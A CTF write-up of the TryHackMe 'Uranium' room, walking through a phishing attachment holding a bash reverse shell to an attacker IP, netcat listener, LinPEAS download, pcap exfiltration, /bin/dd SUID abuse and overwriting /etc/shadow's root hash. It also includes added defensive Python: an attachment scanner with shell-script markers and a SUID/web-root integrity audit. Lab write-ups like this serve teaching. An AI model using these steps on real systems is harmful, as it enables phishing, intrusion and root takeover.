My second YouTube video is now live! This time around it's for the Try Hack Me Uranium CTF and you can watch it here!
The Uranium Writeup!
So, this writeup is for Uranium, which is listed as a Hard room on Try Hack Me (link at the bottom).
It did challenge me! But, it was a really enjoyable room to do so I encourage you to give it a go.
The brief gave us some starting points and also gives us our goals for this which are;
- Password for the Chat App
- What is hakanbey’s password
- user_1.txt flag
- user_2.txt flag
Firstly, let's add the IP into our hosts file
echo "<THM_IP> uranium.thm" | sudo tee -a /etc/hosts #NOTE: I have to add what's after the | because of how I run my Kali environment, you may not need to add this
And now moving into Nmap
nmap -sC -sV -p- -oN ./nmap/initial uranium.thm
From our nmap scan, we had SSH, SMTP and HTTP open.
Does he Tweet?
In the room description there is a link to a Twitter account, so let's take a look
So, from these tweets, we can find the following;
- Domain is uranium.thm
- He opens all application files with the filename “application” in terminal
- We have his username
Love twitter enumeration!
The uranium site gave nothing away so let's move on….
You’ve got Mail!
The breadcrumbs I found are pointing towards an email attack so we will move into this using SWAKS.
Firstly we need a file called application containing a reverse shell; since it's opened in a terminal, let's use bash.
echo 'bash -c "bash -i >& /dev/tcp/<YOUR_THM_IP>/9006 0>&1"' > application
Then start our netcat listener with;
nc -lnvp 9006
Then we are going to use SWAKS to send the email with;
swaks --to firstname.lastname@example.org --from email@example.com --header "RE:Coins" --body "I want coins" --attach application --server <THM_IP>
Wait until we catch the reverse shell….
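A mail-gateway check a defender might run for this vector, added here as an example that is not part of the original writeup or the room: it parses a message with Python's standard email library and flags attachments that have no file extension or carry shell-script markers. The sample message is constructed (placeholder addresses, harmless script body).

```python
import email
from email import policy
from email.message import EmailMessage

# Byte patterns that mark an attachment as a shell script rather than a document;
# tune this list for your own gateway.
SCRIPT_MARKERS = (b"#!/", b"bash -c", b"/dev/tcp/")


def suspicious_attachments(raw: bytes) -> list[dict]:
    """One record per attachment that has no extension or script-like content."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if "." not in name:                     # bare names like "application"
            reasons.append("no file extension")
        hits = [m.decode() for m in SCRIPT_MARKERS if m in payload]
        if hits:
            reasons.append("script markers: " + ", ".join(hits))
        if reasons:
            findings.append({"filename": name,
                             "content_type": part.get_content_type(),
                             "reasons": reasons})
    return findings


def build_sample() -> bytes:
    """Constructed message shaped like the one above, with a harmless script body."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "recipient@example.org"
    msg["Subject"] = "RE:Coins"
    msg.set_content("I want coins")
    msg.add_attachment(b'#!/bin/bash\necho "constructed sample"\n',
                       maintype="application", subtype="octet-stream",
                       filename="application")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in suspicious_attachments(build_sample()):
        print(finding)
```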
In hakanbey's home folder you will find user_1.txt; open it with
There is also a file called chat_with_kral4. Trying to run this, I got a request for a password, which I had no idea about.
We need to enumerate, and I'm going to use LinPEAS to do that
# Change into the directory with your linpeas.sh file in, then run:
python3 -m http.server
# Note what port the HTTP server started on, then on the reverse shell:
wget http://<Your_THM_IP>:<HTTP_PORT>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
After running LinPEAS, there were two things I prioritised looking at;
- A .pcap file in /var/log
- LinPEAS highlighted /bin/dd
Firstly, let's get that pcap! In order to do that we are going to change into the directory, upgrade our shell, start a webserver, then download it to our Kali terminal.
# On the reverse shell
cd /var/log
export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -m http.server 8010
# On your Kali machine
wget http://<THM_IP>:8010/hakanbey_network_log.pcap
We have the pcap file!
Open this in Wireshark, right click on the first entry, then Follow > TCP Stream and you will have the password for the chat app!
So, after running the webserver I had to CTRL+C to get out of it!
So I started the Netcat listener as before, sent the email we did before, and I was back in with my reverse shell.
Once in there as hakanbey, I ran the chat application with;
When it asks you for a password this time use the one from the PCAP file.
Now, the fun part! Talk to the chat app to get hakanbey’s password!
So now let's SSH into the box as hakanbey using the password we got
Let's check what hakanbey can do with
Looks like there is another command hakanbey can run with that!
sudo -u <COMMAND_FROM_SUDO-L>
Now, let's change into that user's home directory and you will find the user2 flag
cd /home/kral4
cat user_2.txt
A DD to the Web?
So with two flags left to get, I decided on the web flag!
With it being the web flag, I decided to check where the website would be
Then looking in that folder I found web_flag.txt! Awesome!
And we have web flag…… no…..wait….. That would be too easy! So how do we get the flag? We had /bin/dd to check out didn’t we….
So that has file write, file read, suid and sudo and we want to read a file…..
/bin/dd if=web_flag.txt #NOTE: Please look at the GTFOBins entry for dd to understand why this works rather than just pasting the code
Fake an Attack? Really?
When you SSH into the machine a note says you have mail, and obviously we should be reading other people's emails! Let's have a look in;
cd /var/mail
ls
There is mail for kral4 so let's;
There wasn’t a nano file in kral4’s home directory
So let's go there, copy nano and see if it has SUID
cp /bin/nano /home/kral4
cd /home/kral4
So we have nano in there, but the copied nano doesn't have SUID!
It did say to keep it there in case index.html was attacked again….. let's attack index.html and see what happens….
We can use /bin/dd to make a change to the index.html file, so let's do that with;
echo "theirsecurity.com" | /bin/dd of=/var/www/html/index.html
We amended the index.html file, but did we get SUID?
Success!! We got it!!
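The two host-side changes in this chain, the overwritten index.html and a fresh SUID copy of nano, are exactly what a file-integrity audit catches. Added example, not from the writeup or the room: it diffs SUID binaries and web-root file hashes against a baseline, using a constructed temporary tree in place of /var/www/html and /home/kral4.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def find_suid(root: str) -> set[str]:
    """Paths of regular files under root that carry the setuid bit."""
    hits = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode       # lstat: do not follow symlinks
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                hits.add(path)
    return hits


def hash_tree(root: str) -> dict[str, str]:
    """Map every regular file under root to its SHA-256 digest (the baseline)."""
    return {os.path.join(d, f): hashlib.sha256(Path(d, f).read_bytes()).hexdigest()
            for d, _dirs, files in os.walk(root) for f in files}


def audit(suid_baseline: set[str], suid_root: str, web_baseline: dict[str, str], web_root: str):
    """Return (SUID files not in the baseline, web files that changed or appeared)."""
    new_suid = sorted(find_suid(suid_root) - suid_baseline)
    changed = sorted(p for p, h in hash_tree(web_root).items() if web_baseline.get(p) != h)
    return new_suid, changed


def demo() -> tuple[list[str], list[str]]:
    """Constructed tree mirroring the box (a web root and a home dir), then the two changes."""
    root = Path(tempfile.mkdtemp())
    home, web = root / "home", root / "www"
    home.mkdir()
    web.mkdir()
    (web / "index.html").write_bytes(b"<h1>original</h1>\n")
    baseline = hash_tree(str(web))                           # snapshot before the tamper
    (web / "index.html").write_bytes(b"theirsecurity.com\n")  # the dd overwrite above
    nano = home / "nano"
    nano.write_bytes(b"stand-in for the copied nano")
    nano.chmod(0o4755)                                       # setuid bit, as the trigger sets
    new_suid, changed = audit(set(), str(home), baseline, str(web))
    return [os.path.basename(p) for p in new_suid], [os.path.basename(p) for p in changed]
```

On a real host you would snapshot find_suid("/") and hash_tree("/var/www/html") at build time and run audit against those on a schedule.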
Perl to Root
We have a few different options to take to get root access, but now that I have nano with SUID I'm going to amend /etc/shadow.
So let's open this with;
We obviously can't just type a new root password in there as it wouldn't work, but we can use perl to generate one. So in a terminal window type;
perl -e "print crypt('password','\$6\$SALTsalt\$')" #NOTE: where I have typed password, that is the password the hash will be generated from
So we can take this and paste this into our shadow file. Paste this between root: and the second :
If you want to see this done, you can use the video at the top of the page #shamelessplug
So CTRL+X to exit and then Y then enter.
We have changed the root password, now to use it!
su root # then enter the password we changed it to
We are now root!
Change into the root directory and cat the root.txt file
Try Hack Me Uranium Conclusion
I really enjoyed this room a lot!
The chatbot was a great addition and I think hakanbey did an amazing job at replicating a phishing attack on a virtual machine. It was a great implementation, and practising phishing attacks isn't common in capture the flag environments!
It is labelled as a hard room, and I can see why because the paths you take aren't guided (this makes it more fun). What you see above is the way I managed to complete it; it doesn't include every path I took that didn't work, but I just kept going at it!
I really recommend you give this a go!
I hope you enjoyed reading!
Go to http://www.tryhackme.com/ to try this and many more CTFs
If you want to go directly to Try Hack Me Uranium – https://tryhackme.com/room/uranium – Thanks again to hakanbey01
Contact Me with any requests or suggestions for next room!